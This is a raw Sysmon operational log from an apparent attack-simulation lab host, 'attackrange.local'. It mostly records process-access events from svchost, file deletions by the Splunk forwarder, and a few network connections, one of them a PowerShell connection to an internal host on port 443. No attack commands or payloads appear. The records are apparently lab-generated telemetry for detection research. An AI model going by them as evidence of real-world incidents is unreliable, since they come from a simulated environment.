21:55:11.091{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127691Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:11.091{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127690Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:11.091{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127689Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:11.091{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127688Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:11.091{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-82BF-613A-B796-03000000C801}5544C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127687Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:11.091{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-82BF-613A-B796-03000000C801}5544C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127686Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:11.076{B81B27B7-82BF-613A-B796-03000000C801}5544C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035127685Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:11.044{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBF49ABA430BEE2CE0FF3F3C9056E3AA,SHA256=7486B509C71682C29E14FFA4B230327A0F8EA4F9A9CC0D22A26BFD3A03789E2A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127698Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:12.074{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D89BCD0F08FA64F330407DC5ABD617F5,SHA256=6733894443FB3B041CDC8C4170AA6D301B4CE84FD5150609ABCB1BCD6407C3DC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127699Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:13.089{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A12553A54735FD12883DDD4D58B43F2C,SHA256=E03837E94BCA68C52FDAB3F20139023885CBF551AE81F3D610D4072350BC76A8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127701Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:39.237{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62064-false10.0.1.12-8000- 23542300x800000000000000035127700Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:14.180{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B445E75E3E9108686BA63F608461403E,SHA256=51920F3A672FBD7F1A6D9F60E9D0A6F4649A467D3F151E577C6D842F2F144C75,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127702Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:15.195{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E453EBAEC72BAE8D069529DF81E4FC1,SHA256=E93FD44E273BB68E6C44252F1B4E1523AA45240E7D8F873C627AA82B3B6EF3B2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127705Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:41.268{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62065-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127704Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:16.212{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD6E9858AFE777060026891B4E2E3742,SHA256=93CE3EF2EDFA29ABE7BB554231C4066EE49D4FF33290AFC5B00B138521D35092,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127703Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:16.179{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=19FD15579F9680B800F724765C2AD48C,SHA256=3BD307F9C5B60B05BDDD8026191317CF43BEC623ECBCA4206174C804963A8693,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127706Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:17.262{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87C0A9DE06E1881A1CA860981BE7EFA7,SHA256=00CF871820E83ACC33F57107F99A04F935D2BEDB281CC2025789F0EB0E3E208B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127736Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:18.776{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C611A4DCBCC19D2F0BB0F9782F9C2780,SHA256=7E66CA72B0E78BDDE53A0618E5500CF757F3B6F248C86BFA3D629299E91BABEB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127735Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:18.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127734Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:18.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127733Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:18.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127732Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:18.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127731Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:18.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127730Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:18.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127729Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:18.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127728Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:18.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127727Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:18.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127726Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:18.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127725Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:18.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127724Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:18.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127723Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:18.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127722Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:18.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127721Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:18.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127720Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:18.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127719Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:18.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127718Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 